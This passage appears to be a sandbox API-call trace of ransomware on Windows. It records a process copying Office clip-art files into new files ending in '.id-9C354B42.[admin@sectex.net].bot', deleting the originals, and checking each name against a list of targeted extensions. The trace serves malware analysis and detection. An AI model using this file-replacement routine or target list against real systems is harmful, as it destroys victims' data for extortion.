	[0140.670] ReadFile (in: hFile=0x398, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.670] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.670] SetEndOfFile (hFile=0x384) returned 1
	[0140.674] CloseHandle (hObject=0x384) returned 1
	[0140.675] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.675] SetEndOfFile (hFile=0x398) returned 1
	[0140.678] CloseHandle (hObject=0x398) returned 1
	[0140.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.691] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid")) returned 1
	[0140.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.691] lstrlenW (lpString=".doc") returned 4
	[0140.691] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.691] lstrlenW (lpString=".docx") returned 5
	[0140.691] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.691] lstrlenW (lpString=".pdf") returned 4
	[0140.691] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.691] lstrlenW (lpString=".xls") returned 4
	[0140.691] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.691] lstrlenW (lpString=".xlsx") returned 5
	[0140.691] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.691] lstrlenW (lpString=".ppt") returned 4
	[0140.691] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.691] lstrlenW (lpString=".zip") returned 4
	[0140.691] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.692] lstrlenW (lpString=".rar") returned 4
	[0140.692] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.692] lstrlenW (lpString=".bz2") returned 4
	[0140.692] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.692] lstrlenW (lpString=".7z") returned 3
	[0140.692] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.692] lstrlenW (lpString=".dbf") returned 4
	[0140.692] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.692] lstrlenW (lpString=".1cd") returned 4
	[0140.692] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.692] lstrlenW (lpString=".jpg") returned 4
	[0140.692] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.692] lstrlenW (lpString=".doc") returned 4
	[0140.692] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.692] lstrlenW (lpString=".docx") returned 5
	[0140.692] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.692] lstrlenW (lpString=".pdf") returned 4
	[0140.692] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.692] lstrlenW (lpString=".xls") returned 4
	[0140.692] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.692] lstrlenW (lpString=".xlsx") returned 5
	[0140.692] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.692] lstrlenW (lpString=".ppt") returned 4
	[0140.692] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.692] lstrlenW (lpString=".zip") returned 4
	[0140.692] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.692] lstrlenW (lpString=".rar") returned 4
	[0140.692] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.693] lstrlenW (lpString=".bz2") returned 4
	[0140.693] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.693] lstrlenW (lpString=".7z") returned 3
	[0140.693] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.693] lstrlenW (lpString=".dbf") returned 4
	[0140.693] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.693] lstrlenW (lpString=".1cd") returned 4
	[0140.693] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63
	[0140.693] lstrlenW (lpString=".jpg") returned 4
	[0140.693] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.693] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.693] lstrlenW (lpString="PARNT_07.MID") returned 12
	[0140.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.694] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=6564) returned 1
	[0140.694] CloseHandle (hObject=0x3a0) returned 1
	[0140.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid")) returned 0x20
	[0140.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.694] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.694] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.695] GetLastError () returned 0x0
	[0140.695] ReadFile (in: hFile=0x3a0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x19a4, lpOverlapped=0x0) returned 1
	[0140.696] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x19b0, lpOverlapped=0x0) returned 1
	[0140.697] ReadFile (in: hFile=0x3a0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.697] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.697] SetEndOfFile (hFile=0x3ac) returned 1
	[0140.697] CloseHandle (hObject=0x3ac) returned 1
	[0140.697] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.697] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.755] CloseHandle (hObject=0x3a0) returned 1
	[0140.755] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.767] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid")) returned 1
	[0140.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.767] lstrlenW (lpString=".doc") returned 4
	[0140.767] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.767] lstrlenW (lpString=".docx") returned 5
	[0140.767] lstrcmpiW (lpString1=".docx", lpString2="7.MID") returned -1
	[0140.767] lstrlenW (lpString=".pdf") returned 4
	[0140.767] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.768] lstrlenW (lpString=".xls") returned 4
	[0140.768] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.768] lstrlenW (lpString=".xlsx") returned 5
	[0140.768] lstrcmpiW (lpString1=".xlsx", lpString2="7.MID") returned -1
	[0140.768] lstrlenW (lpString=".ppt") returned 4
	[0140.768] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.768] lstrlenW (lpString=".zip") returned 4
	[0140.768] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.768] lstrlenW (lpString=".rar") returned 4
	[0140.768] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.768] lstrlenW (lpString=".bz2") returned 4
	[0140.768] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.768] lstrlenW (lpString=".7z") returned 3
	[0140.768] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.768] lstrlenW (lpString=".dbf") returned 4
	[0140.768] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.768] lstrlenW (lpString=".1cd") returned 4
	[0140.768] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.768] lstrlenW (lpString=".jpg") returned 4
	[0140.768] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.768] lstrlenW (lpString=".doc") returned 4
	[0140.768] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.768] lstrlenW (lpString=".docx") returned 5
	[0140.768] lstrcmpiW (lpString1=".docx", lpString2="7.MID") returned -1
	[0140.768] lstrlenW (lpString=".pdf") returned 4
	[0140.768] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.768] lstrlenW (lpString=".xls") returned 4
	[0140.768] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.769] lstrlenW (lpString=".xlsx") returned 5
	[0140.769] lstrcmpiW (lpString1=".xlsx", lpString2="7.MID") returned -1
	[0140.769] lstrlenW (lpString=".ppt") returned 4
	[0140.769] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.769] lstrlenW (lpString=".zip") returned 4
	[0140.769] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.769] lstrlenW (lpString=".rar") returned 4
	[0140.769] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.769] lstrlenW (lpString=".bz2") returned 4
	[0140.769] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.769] lstrlenW (lpString=".7z") returned 3
	[0140.769] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.769] lstrlenW (lpString=".dbf") returned 4
	[0140.769] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.769] lstrlenW (lpString=".1cd") returned 4
	[0140.769] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63
	[0140.769] lstrlenW (lpString=".jpg") returned 4
	[0140.769] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.769] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.769] lstrlenW (lpString="PARNT_09.MID") returned 12
	[0140.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.770] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=6764) returned 1
	[0140.770] CloseHandle (hObject=0x3ac) returned 1
	[0140.770] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid")) returned 0x20
	[0140.770] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.770] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.770] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.771] GetLastError () returned 0x0
	[0140.771] ReadFile (in: hFile=0x3ac, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x1a6c, lpOverlapped=0x0) returned 1
	[0140.778] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x1a70, lpOverlapped=0x0) returned 1
	[0140.779] ReadFile (in: hFile=0x3ac, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.779] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.780] SetEndOfFile (hFile=0x384) returned 1
	[0140.780] CloseHandle (hObject=0x384) returned 1
	[0140.780] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.780] SetEndOfFile (hFile=0x3ac) returned 1
	[0140.783] CloseHandle (hObject=0x3ac) returned 1
	[0140.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.783] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid")) returned 1
	[0140.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.784] lstrlenW (lpString=".doc") returned 4
	[0140.784] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.784] lstrlenW (lpString=".docx") returned 5
	[0140.784] lstrcmpiW (lpString1=".docx", lpString2="9.MID") returned -1
	[0140.784] lstrlenW (lpString=".pdf") returned 4
	[0140.784] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.784] lstrlenW (lpString=".xls") returned 4
	[0140.784] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.784] lstrlenW (lpString=".xlsx") returned 5
	[0140.784] lstrcmpiW (lpString1=".xlsx", lpString2="9.MID") returned -1
	[0140.784] lstrlenW (lpString=".ppt") returned 4
	[0140.784] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.784] lstrlenW (lpString=".zip") returned 4
	[0140.784] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.784] lstrlenW (lpString=".rar") returned 4
	[0140.784] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.784] lstrlenW (lpString=".bz2") returned 4
	[0140.784] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.784] lstrlenW (lpString=".7z") returned 3
	[0140.784] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.784] lstrlenW (lpString=".dbf") returned 4
	[0140.784] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.784] lstrlenW (lpString=".1cd") returned 4
	[0140.784] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.784] lstrlenW (lpString=".jpg") returned 4
	[0140.784] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.784] lstrlenW (lpString=".doc") returned 4
	[0140.784] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.785] lstrlenW (lpString=".docx") returned 5
	[0140.785] lstrcmpiW (lpString1=".docx", lpString2="9.MID") returned -1
	[0140.785] lstrlenW (lpString=".pdf") returned 4
	[0140.785] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.785] lstrlenW (lpString=".xls") returned 4
	[0140.785] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.785] lstrlenW (lpString=".xlsx") returned 5
	[0140.785] lstrcmpiW (lpString1=".xlsx", lpString2="9.MID") returned -1
	[0140.785] lstrlenW (lpString=".ppt") returned 4
	[0140.785] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.785] lstrlenW (lpString=".zip") returned 4
	[0140.785] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.785] lstrlenW (lpString=".rar") returned 4
	[0140.785] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.785] lstrlenW (lpString=".bz2") returned 4
	[0140.785] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.785] lstrlenW (lpString=".7z") returned 3
	[0140.785] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.785] lstrlenW (lpString=".dbf") returned 4
	[0140.785] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.785] lstrlenW (lpString=".1cd") returned 4
	[0140.785] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63
	[0140.785] lstrlenW (lpString=".jpg") returned 4
	[0140.785] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.785] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.785] lstrlenW (lpString="PARNT_10.MID") returned 12
	[0140.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.791] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=5393) returned 1
	[0140.791] CloseHandle (hObject=0x31c) returned 1
	[0140.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid")) returned 0x20
	[0140.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0140.988] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.990] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0141.176] GetLastError () returned 0x0
	[0141.176] ReadFile (in: hFile=0x3b0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x1511, lpOverlapped=0x0) returned 1
	[0141.177] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x1520, lpOverlapped=0x0) returned 1
	[0141.178] ReadFile (in: hFile=0x3b0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
